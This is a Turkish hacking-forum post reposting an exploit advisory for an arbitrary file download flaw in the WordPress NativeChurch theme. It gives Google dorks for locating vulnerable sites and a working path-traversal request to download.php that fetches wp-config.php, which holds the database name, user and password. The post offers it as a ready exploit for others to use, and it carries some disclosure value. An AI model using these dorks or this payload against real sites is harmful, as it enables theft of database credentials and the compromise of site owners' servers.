İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download

27-02-2019 18:57
#1
Ludas - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Ludas.py
Yaş:
19
Mesajlar:
216
Teşekkür (Etti):
27
Teşekkür (Aldı):
39
Konular:
28
Ticaret:
(0) %
################################################## ##################

# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/02/2019
# Vendor Homepage : themeforest.net
# Software Information Link :
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : WordPress From 3.9 to 5.0.x
Compatible with Bootstrap 3.x - bbPress 2.5.x
From WooCommerce 2.1.x To WooCommerce 3.4.x,
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
inurl:''inurl:/wp-content/themes/NativeChurch/download/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : packetstormsecurity.com/files/151851/WordPress-NativeChurch-Multi-Purpose-5.0.x-File-Download.html


################################################## ##################

# Yazılım hakkında açıklama :
***************************

NativeChurch, kilise için tasarlanmış ve geliştirilmiş güçlü bir WordPress Temasıdır,

Sadaka, kar amacı gütmeyen ve dini Web siteleri ve kullanışlı geliyor

portföy / kurumsal web siteleri için de.


################################################## ##################

# Etki :
***********
* * Wordpress için yerel kilise teması, saldırganlara izin veren bir güvenlik açığına eğilimli

uygulama, kullanıcı tarafından sağlanan girişi yeterince sterilize etmediğinden keyfi dosyaları indirin.

Bir saldırgan, bağlam içindeki keyfi dosyaları indirmek için bu sorunu kullanabilir

Web sunucusu işleminin. Elde edilen bilgiler daha fazla saldırıda yardımcı olabilir.

Saldırganlar bu sorunu kullanmak için bir tarayıcı kullanabilir.

* Yazılım içinde olması gereken bir yol adı oluşturmak için harici giriş kullanır

kısıtlı dizin, ancak dizileri düzgün bir şekilde nötralize etmez

mesela." ."bu, bu dizinin dışındaki bir konuma giderilebilir.


################################################## ##################


# Keyfi dosya indirme :

******************************
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php

# MySQL Wordpress yapılandırma dosyası hakkında örnek bilgiler :
************************************************** *********
/** Nom de la base de données de WordPress. */
define('DB_NAME',

/** Utilisateur de la base de données MySQL. */
define('DB_USER',

/** Mot de passe de la base de données MySQL. */
define('DB_PASSWORD',

/** Adresse de l'hébergement MySQL. */
define('DB_HOST',


################################################## #################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################## ##################


Exploit : https://cxsecurity.com/issue/WLB-2019020279
Kullanıcı İmzası

|~ Yalnızlık olsun istediğin, uzaya mahkum ederim. ~|

Telegram ⋟ @Ludas_THT

|~ Vaktimiz doldu, artık gözlerin kapalı. ~|


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı